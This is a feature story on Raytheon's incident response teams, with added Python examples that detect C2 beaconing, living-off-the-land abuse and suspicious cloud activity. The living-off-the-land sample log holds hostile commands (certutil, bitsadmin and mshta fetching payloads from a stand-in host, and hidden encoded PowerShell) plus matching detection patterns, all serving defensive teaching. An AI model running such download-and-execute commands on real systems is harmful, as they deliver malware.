For code and country
Raytheon’s cybersecurity incident response teams mitigate attacks against US
In the suburbs of Washington, D.C., morning sunlight illuminates an array of computer monitors in a home office.
Far from flickering screens in dark rooms often seen in Hollywood’s portrayal of cyber defenders, this is the real-world workspace of Daniel, a cybersecurity analyst lead with a Raytheon cybersecurity incident response team.
Rather than in a clandestine bunker, analysts like Daniel often work from home. Together with his team, many of them working remotely across the country, he protects U.S. digital infrastructure from myriad cyber threats.
“We are involved in a lot that keeps the American way of life running, and we fight all kinds of actors,” said Daniel. “Every day brings something new. It’s a lot of fun. The job is a giant puzzle, and I like that aspect of it.”
Behind the screens with the real cyber CSI
Part of the team’s work is known as host forensics: examining individual systems such as desktops, laptops and mobile devices for evidence of a cyber incident. By analyzing logs, file-system metadata and other artifacts, the team can reconstruct how an attack unfolded and assess the damage. Raytheon’s cyber incident response teams are well known in this field, possessing the expertise and tools to address intricate cybersecurity problems.
The rise of remote work has opened new opportunities for attackers, particularly those acting on behalf of nations vying for dominance in the information realm.
“The volume and scope of what cybersecurity professionals must deal with are daunting. We’ve gone from being secure by implementing firewalls to now analyzing large volumes of data,” said Julian Zottl, chief technology officer for Cyber Protection Solutions at Raytheon. “Cybersecurity has gone from an IT implementation to a big-data engineering problem very quickly.”
Digital Defense Dictionary
Artifacts: Digital traces left by activities on a computer system. Like clues at a crime scene, analysts use them to figure out a cyberattack.
Bad actor: Individuals or groups that attack or exploit computer systems maliciously.
Burn a bad actor: Disrupting an attacker’s operations by revealing their tactics, techniques and tools to the public.
C2: Short for command and control, it is the means attackers use to control compromised systems.
Cyber threat: Actions that could damage or break into computer systems or networks.
Data exfiltration: Unauthorized transfer of data out of a system or network, usually so the attacker can sell or misuse it.
Denial-of-Service attack: Overwhelming a system with traffic or requests so that legitimate users can no longer reach it.
Encryption: Transforming data with a secret key so that only someone holding the key can read it; without the key the data is unintelligible.
Hunt: Proactively searching systems and networks for threats that automated defenses have not caught.
Incident response: Detecting, containing and eradicating an attack, then restoring affected systems while keeping downtime low.
Intrusion detection system: Monitors network or host activity for signs of an intruder, much as a home security system watches for a break-in.
Living off the land: Attackers using existing, legitimate tools on a system for malicious activity, making detection difficult.
Malware: Software designed to harm or steal information from digital systems.
Needle in a stack of needles: That one malicious bit of code in a sea of data.
Social engineering: Tricking users into compromising security or revealing sensitive information.
SolarWinds incident: Discovered in December 2020, bad actors had inserted a backdoor into legitimate software updates for the Orion platform from U.S.-based company SolarWinds; the trojanized updates reached thousands of organizations worldwide, underscoring the sophistication and impact of software supply-chain attacks.
TTPs: Tactics, techniques and procedures, the recognizable patterns by which attackers plan, execute and manage their operations.
Two-factor authentication: Verifying identity with two independent factors, such as a password and a one-time code sent to a phone.
Zero-day vulnerability: A software vulnerability unknown to its maker, so no patch exists yet and attackers who discover it can exploit it freely.
Host forensics:
- Analyzes individual systems such as desktops and laptops.
- Uncovers digital evidence like logs and metadata.
- Investigates user activities and software to trace attacks.
- Identifies the source, actions taken, and extent of a breach.
Network forensics:
- Monitors and analyzes network traffic for threats.
- Relies on data sources such as packet captures and flow records.
- Examines IP addresses and protocols to detect intrusions.
- Reveals the scope and sources of malicious network activities.
Cloud forensics:
- Investigates digital evidence within cloud environments.
- Extracts data from virtual machines and cloud applications.
- Navigates unique challenges of distributed and shared resources.
- Uncovers unauthorized access, data breaches, or other malicious activities.
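Two of the network-forensics bullets above, working from flow records to reveal the sources and scope of malicious activity, can be shown concretely. The following is an added example (not code from Raytheon or this article) that runs over a constructed set of flow records: it flags a (source, destination, port) tuple whose connections arrive at suspiciously regular intervals, the signature of a timer-driven C2 beacon, and separately flags any host that has pushed more than a threshold of bytes to one destination, a crude exfiltration check. The CSV layout, the sample addresses and the thresholds are all assumptions for illustration.

```python
"""Flow-record triage: periodic beaconing and bulk egress (added example)."""
import csv
import io
import statistics
from collections import defaultdict

# Constructed sample flow records (not real customer data). Fields mimic a
# minimal NetFlow/IPFIX export: epoch start time, source, destination,
# destination port and bytes sent by the source.
SAMPLE_FLOWS = """\
start,src,dst,dport,bytes_out
1700000000,10.0.0.5,203.0.113.7,443,1200
1700000060,10.0.0.5,203.0.113.7,443,1200
1700000121,10.0.0.5,203.0.113.7,443,1200
1700000180,10.0.0.5,203.0.113.7,443,1200
1700000242,10.0.0.5,203.0.113.7,443,1200
1700000300,10.0.0.5,203.0.113.7,443,1200
1700000359,10.0.0.5,203.0.113.7,443,1200
1700000420,10.0.0.5,203.0.113.7,443,1200
1700000005,10.0.0.5,198.51.100.10,443,50000
1700000012,10.0.0.5,198.51.100.10,443,50000
1700000300,10.0.0.5,198.51.100.10,443,50000
1700000900,10.0.0.5,198.51.100.10,443,50000
1700000910,10.0.0.5,198.51.100.10,443,50000
1700002000,10.0.0.5,198.51.100.10,443,50000
1700003600,10.0.0.9,203.0.113.20,443,90000000
1700003700,10.0.0.9,203.0.113.20,443,85000000
1700003800,10.0.0.9,203.0.113.20,443,80000000
"""


def parse_flows(text):
    """Parse CSV flow records into dicts with numeric fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({
            "start": int(row["start"]),
            "src": row["src"],
            "dst": row["dst"],
            "dport": int(row["dport"]),
            "bytes_out": int(row["bytes_out"]),
        })
    return rows


def find_beacons(flows, min_flows=6, max_cv=0.15):
    """Flag (src, dst, dport) tuples whose connection gaps are suspiciously regular.

    The coefficient of variation (stdev / mean) of the inter-connection gaps is
    near zero for a timer-driven implant and large for human-driven browsing.
    Thresholds are illustrative and must be tuned against a real baseline.
    """
    by_tuple = defaultdict(list)
    for f in flows:
        by_tuple[(f["src"], f["dst"], f["dport"])].append(f["start"])
    hits = []
    for key, times in by_tuple.items():
        if len(times) < min_flows:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append((*key, len(times), mean, cv))
    return hits


def find_large_egress(flows, threshold_bytes):
    """Sum bytes sent per (src, dst) and return the pairs above the threshold."""
    totals = defaultdict(int)
    for f in flows:
        totals[(f["src"], f["dst"])] += f["bytes_out"]
    return sorted((src, dst, total)
                  for (src, dst), total in totals.items() if total > threshold_bytes)


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for src, dst, dport, n, mean, cv in find_beacons(flows):
        print(f"beacon candidate: {src} -> {dst}:{dport} "
              f"({n} flows, every {mean:.0f}s, cv={cv:.3f})")
    for src, dst, total in find_large_egress(flows, 100_000_000):
        print(f"bulk egress: {src} -> {dst} sent {total / 1e6:.0f} MB")
```

On the constructed data the 60-second connections from 10.0.0.5 to 203.0.113.7 are flagged as a beacon while the irregular browsing to 198.51.100.10 is not, and 10.0.0.9 is flagged for sending roughly 255 MB to a single external host. Real beacons add jitter, so the coefficient-of-variation cutoff is the knob an analyst tunes against the environment's baseline.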
Collaboration and automation in a matrix of malware
“Every day presents a new challenge,” said Jack, a cybersecurity analyst technical lead. “Sometimes we’re handed a hard drive with minimal information, other times we’re in environments with tens of thousands of systems to analyze.”
Jack explains how crucial collaborating is, emphasizing how team dynamics help ensure nothing is overlooked.
“My colleagues will be sitting there looking at the same data set, and they’re going to find something I may have missed. It’s knowing each other’s strong points and playing off each other,” Jack said.
Raytheon is investing in automation to discover and analyze incidents faster, reduce human error and produce actionable intelligence sooner.
Automating rote tasks frees up the team to use their critical-thinking skills and work more closely with customers, tailoring their approach based on the specifics of an incident and the complexity of the network.
“If industrial control systems are involved, we bring in our specialists in that domain,” said James, a cyber incident response manager. “Likewise, if it’s a cloud infrastructure issue, our cloud experts step in.”
Looking for a needle in a stack of needles
Regina is a cybersecurity analyst lead, overseeing more than 30 team members. Her analysts comb through data to look for evidence of cyberattacks, uncovering anomalies and finding any intrusions.
“It’s like searching for a needle in a stack of needles,” Regina said.
Some of the hardest intrusions to detect are those designed to happen quietly and invisibly. One such tactic, called “living off the land,” uses tools that are already present and trusted in the environment, so the activity does not stand out as an anomaly and evades detection.
“It blurs the line between legitimate activity and potential threats,” said Joseph, a cybersecurity analyst.
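Because the binaries involved in living off the land are legitimate, detection has to key on context, chiefly the command-line arguments and the parent process, rather than on the program itself. The following is an added example, not code from Raytheon or this article, that applies a handful of such context rules to constructed process-creation events in a flattened key=value form loosely resembling Sysmon Event ID 1. The rule set, the log format and the sample hosts are assumptions for illustration; a production rule set would be larger and tuned against the environment's baseline.

```python
"""Living-off-the-land triage over process-creation events (added example)."""
import ntpath
import re

# Constructed process-creation events (not from any real incident). The
# key=value layout is an assumption; a real pipeline would read Sysmon or
# 4688 events instead.
SAMPLE_EVENTS = r"""
2024-03-02T09:12:41Z host=WS-042 user=jdoe parent=explorer.exe image=C:\Windows\System32\certutil.exe cmdline="certutil -hashfile C:\Users\jdoe\Downloads\setup.msi SHA256"
2024-03-02T09:14:03Z host=WS-042 user=jdoe parent=cmd.exe image=C:\Windows\System32\certutil.exe cmdline="certutil -urlcache -split -f http://203.0.113.7/a.txt C:\Users\jdoe\AppData\Local\Temp\a.txt"
2024-03-02T09:14:09Z host=WS-042 user=jdoe parent=cmd.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
2024-03-02T10:02:55Z host=WS-017 user=asmith parent=winword.exe image=C:\Windows\System32\cmd.exe cmdline="cmd /c start mshta http://203.0.113.7/x.hta"
2024-03-02T10:30:12Z host=WS-017 user=asmith parent=explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell Get-Process | Sort-Object CPU"
2024-03-02T11:05:30Z host=SRV-03 user=svc_backup parent=services.exe image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer job /download /priority high http://203.0.113.7/b.exe C:\Users\Public\b.exe"
"""

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"$'
)

# (image basename, case-insensitive regex over the command line, finding text).
# The binaries are all legitimate; only the argument pattern is suspicious.
CMDLINE_RULES = [
    ("certutil.exe", r"-urlcache|-decode|-encode",
     "certutil used to download or decode a payload"),
    ("powershell.exe",
     r"(^|\s)-(enc|encodedcommand|e)\b|downloadstring|invoke-expression|\biex\b|frombase64string",
     "PowerShell encoded command or download cradle"),
    ("mshta.exe", r"https?://|javascript:|vbscript:",
     "mshta executing remote or inline script"),
    ("regsvr32.exe", r"/i:https?://|scrobj\.dll",
     "regsvr32 loading a remote scriptlet"),
    ("bitsadmin.exe", r"/transfer", "bitsadmin used to transfer a file"),
    ("wmic.exe", r"process\s+call\s+create", "wmic used to spawn a process"),
]

# Parent/child pairing that is almost never legitimate: an Office document
# spawning a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def scan(text):
    """Return one finding dict per rule match, in log order."""
    findings = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the triage
        ev = m.groupdict()
        image = ntpath.basename(ev["image"]).lower()
        parent = ntpath.basename(ev["parent"]).lower()
        for binary, pattern, rule in CMDLINE_RULES:
            if image == binary and re.search(pattern, ev["cmdline"], re.IGNORECASE):
                findings.append({"ts": ev["ts"], "host": ev["host"],
                                 "user": ev["user"], "rule": rule})
        if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": "Office application spawned a shell or script host"})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']}: {f['rule']}")
```

Note what is not flagged: the same certutil binary computing a file hash, and PowerShell listing processes from an interactive session. Both are exactly the legitimate uses that give living off the land its cover, which is why the rules look at arguments and lineage rather than the executable name.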
Regina and many of her colleagues have a saying: Bad actors only need to win once. We have to win every time.
“The bad guys often have the upper hand because they operate without any rules, while we, as the defenders, must operate within strict boundaries,” she said.
Each day presents a different challenge for Regina and her team, from misconfigured servers and insecure edge devices to potential breaches that require swift action. However, it is not just about reacting to problems as they arise; it is also about proactively hunting down vulnerabilities and strengthening security measures.
From the team
Burning bad actors
Raytheon’s focus goes beyond finding and mitigating cyberattacks. By publishing findings about identified threats, the team not only fortifies defenses but also disrupts adversaries’ operations.
“The most rewarding part of my job is when we can ‘burn’ an adversary’s infrastructure and their tactics, and we make them public knowledge,” Daniel said. “It causes a significant disruption in their operations, forcing them to invest resources in creating new tools or tactics.”
Within the realm of cloud forensics, Raytheon’s cybersecurity incident response teams confront unique challenges. While host forensics and network forensics teams often rely on on-site investigations, Raytheon’s cloud-centric approach allows the team to work with customers remotely, which brings several advantages.
“Our ability to remotely assist customers in making critical configuration changes expedites our response time,” said Mackenzie, a cybersecurity analyst. “We work closely with organizations to secure their cloud portals, grant permissions and use powerful tools for data collection and analytics. It’s a perk of the job when everything falls into place.”
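The cloud-side data collection and analytics Mackenzie describes typically start from the provider's audit log. The following is an added example, not code from Raytheon or this article, that triages a constructed audit log loosely modelled on the AWS CloudTrail record format (the field names and sample principals are assumptions). It applies three checks an analyst would run early in a cloud intrusion: a successful console login without MFA, a principal acting from an address it has never used before, and identity changes that grant persistence or privilege, namely an access key created for a different user and an administrator policy attachment.

```python
"""Cloud audit-log triage for unauthorized access (added example)."""
import json

# Constructed audit events, loosely modelled on the CloudTrail record format.
# Field names are an assumption, not a customer export.
SAMPLE_AUDIT_LOG = """
{"eventTime":"2024-03-02T08:01:10Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.23","userIdentity":{"userName":"jdoe"},"additionalEventData":{"MFAUsed":"Yes"},"responseElements":{"ConsoleLogin":"Success"}}
{"eventTime":"2024-03-02T13:22:47Z","eventName":"ConsoleLogin","sourceIPAddress":"203.0.113.50","userIdentity":{"userName":"jdoe"},"additionalEventData":{"MFAUsed":"No"},"responseElements":{"ConsoleLogin":"Success"}}
{"eventTime":"2024-03-02T13:24:02Z","eventName":"CreateAccessKey","sourceIPAddress":"203.0.113.50","userIdentity":{"userName":"jdoe"},"requestParameters":{"userName":"backup-svc"}}
{"eventTime":"2024-03-02T13:25:40Z","eventName":"AttachUserPolicy","sourceIPAddress":"203.0.113.50","userIdentity":{"userName":"jdoe"},"requestParameters":{"userName":"backup-svc","policyArn":"arn:aws:iam::aws:policy/AdministratorAccess"}}
{"eventTime":"2024-03-02T13:31:15Z","eventName":"ListBuckets","sourceIPAddress":"203.0.113.50","userIdentity":{"userName":"backup-svc"}}
{"eventTime":"2024-03-02T14:05:00Z","eventName":"DescribeInstances","sourceIPAddress":"198.51.100.23","userIdentity":{"userName":"ops-user"}}
"""

# Constructed baseline: source addresses each principal has used historically.
KNOWN_IPS = {
    "jdoe": {"198.51.100.23"},
    "backup-svc": {"10.0.0.44"},
    "ops-user": {"198.51.100.23"},
}

ADMIN_POLICY_SUFFIXES = ("/AdministratorAccess",)


def load_events(text):
    """Parse newline-delimited JSON audit records."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def analyze(events, known_ips):
    """Return (eventTime, principal, finding) tuples in log order."""
    findings = []
    # Copy the baseline so repeated use of one new address is reported once
    # per principal rather than on every API call.
    seen = {user: set(ips) for user, ips in known_ips.items()}

    def add(ev, rule):
        findings.append((ev["eventTime"], ev["userIdentity"]["userName"], rule))

    for ev in events:
        user = ev["userIdentity"]["userName"]
        ip = ev["sourceIPAddress"]
        name = ev["eventName"]
        params = ev.get("requestParameters", {})

        if ip not in seen.setdefault(user, set()):
            seen[user].add(ip)
            add(ev, f"{name} from address never seen for this principal ({ip})")

        if (name == "ConsoleLogin"
                and ev.get("responseElements", {}).get("ConsoleLogin") == "Success"
                and ev.get("additionalEventData", {}).get("MFAUsed") != "Yes"):
            add(ev, "console login succeeded without MFA")

        # A key minted for someone else is a classic persistence step.
        if name == "CreateAccessKey" and params.get("userName") not in (None, user):
            add(ev, f"access key created for another identity ({params['userName']})")

        if name == "AttachUserPolicy" and params.get("policyArn", "").endswith(ADMIN_POLICY_SUFFIXES):
            add(ev, f"administrator policy attached to {params.get('userName')}")
    return findings


if __name__ == "__main__":
    for when, who, what in analyze(load_events(SAMPLE_AUDIT_LOG), KNOWN_IPS):
        print(f"{when} {who}: {what}")
```

Read in order, the findings tell the story an analyst wants: jdoe's account is used without MFA from an unfamiliar address, that session creates a key for backup-svc and makes it an administrator, and backup-svc then starts enumerating storage from the same address. The baseline of known addresses is the piece that has to come from the customer's own history; without it the unfamiliar-address check cannot run.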
According to Mackenzie, it’s a huge mission, and the responsibility can be overwhelming at times. And while threats loom large, their commitment to securing their customers’ critical infrastructure is unwavering.
“There are days when you feel like you’re making a difference, making it more difficult for threat actors to carry out their malicious plans,” Mackenzie said. “There are moments that bring a sense of satisfaction, knowing that actions are being taken to hinder the adversaries’ ability to do their dirty deeds. That’s why I joined the mission and feel fortunate to work with talented teammates.”
Editor’s note: This feature story does not use the full names of the cyber defenders who work on the cybersecurity incident response teams for their privacy and security.